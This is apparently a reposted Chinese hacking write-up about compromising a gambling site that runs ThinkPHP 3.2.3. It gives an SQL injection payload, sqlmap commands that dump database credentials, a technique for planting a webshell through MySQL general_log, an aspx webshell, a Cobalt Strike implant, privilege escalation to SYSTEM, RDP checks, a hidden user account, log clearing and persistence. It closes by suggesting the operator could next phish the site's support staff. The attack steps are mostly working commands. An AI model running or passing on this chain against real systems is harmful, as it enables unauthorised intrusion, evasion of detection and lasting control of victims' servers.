對某棋牌站的一次Getshell

最近在fofa翻目標(biāo)C段的時(shí)候，碰巧看到了這個(gè)站便記了下來，等下班回家后直接拿下

BC類的活動(dòng)頁很多都是 thinkphp二改的站,我們主要確定當(dāng)前tp的版本號(hào)

http://www.abc.com/index.php?s=1

目標(biāo)環(huán)境信息

• Windows

• ThinkPHP v.3.2.3

• 開啟Debug模式

• 網(wǎng)站絕對路徑 ?D:\web1\abc.com\wwlsoeprsueords\

用工具掃描日志文件

tp3 注入漏洞不存在，日志文件在 /addons/Runtime/Logs/admin/ 路徑下，但并沒有掃到任何的日志文件，猜測日志文件可能為另外一個(gè)命名格式

eg. ?1606510976-20_11_28.log
? ? 時(shí)間戳-年_月_日.log

該站點(diǎn)沒有CDN，在fofa上搜IP發(fā)現(xiàn)999端口為phpmyadmin頁面

一般來說，這類的活動(dòng)推廣頁申請進(jìn)度查詢是存在注入的，用burp抓包

payload 如下：

username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13

果不其然，存在注入，還是root權(quán)限，直接就上sqlmap跑

python3 sqlmap.py -r 1.txt --random-agent --dbms=mysql --os-shell

還跑了幾種其他類型的注入，但我們直接 --os-shell報(bào)錯(cuò)，嘗試了幾次都一樣返回No output，猜測可能有某種防護(hù)產(chǎn)品

前面我們有找到phpmyadmin頁面，我們枚舉數(shù)據(jù)庫賬戶和密碼

python3 sqlmap.py –r 1.txt --string="Surname" --users --password

并且已經(jīng)幫我們解碼明文了，root賬號(hào)登錄后報(bào)錯(cuò)#1045 無法登錄服務(wù)器,換成 dog1賬號(hào)登錄成功

phpmyadmin寫shell：

• 導(dǎo)出文件

• 寫日志文件

SHOW GLOBAL VARIABLES LIKE "%secure%";

當(dāng)secure_file_priv的值為null ，表示限制mysql 不允許導(dǎo)入|導(dǎo)出

當(dāng)secure_file_priv的值沒有具體值時(shí)，表示不對mysql 的導(dǎo)入|導(dǎo)出做限制

不允許導(dǎo)出，換寫日志文件方法

SHOW VARIABLES LIKE '%general%'

用命令打開日志保存狀態(tài)，設(shè)置日志保存路徑

set global general_log = "ON";
set global general_log_file='D:/web1/abc.com/robots.php';

在sql查詢語句處執(zhí)行我們的php一句話，然后用蟻劍去連日志文件robots.php即可getshell

查看phpinfo()，發(fā)現(xiàn)ban了成噸的函數(shù)，無法執(zhí)行命令

我們可以上傳aspx馬進(jìn)行繞過，這里我使用的是冰蝎3的aspx馬

現(xiàn)在可以執(zhí)行命令了，但還是無法查看相關(guān)文件夾等其他問題。

查看系統(tǒng)有無殺軟，準(zhǔn)備上線

tasklist /svc

沒有任何殺軟，用cs生成exe上傳到根目錄，然后啟動(dòng)執(zhí)行上線

用爛土豆可以直接提到system權(quán)限

直接通過注冊表查是否開啟3389，端口號(hào)是多少

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服務(wù)是否開啟：1關(guān)閉，0開啟
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber  # 查看RDP服務(wù)的端口

建一個(gè)隱藏用戶直接遠(yuǎn)程登錄過去，清除日志，做自啟動(dòng)，拿下該站點(diǎn)

其實(shí)后面還可以繼續(xù)釣魚，把客服機(jī)器干上來

文章來源：先知社區(qū)

作者：S1xHcL

如有侵權(quán)，請聯(lián)系刪除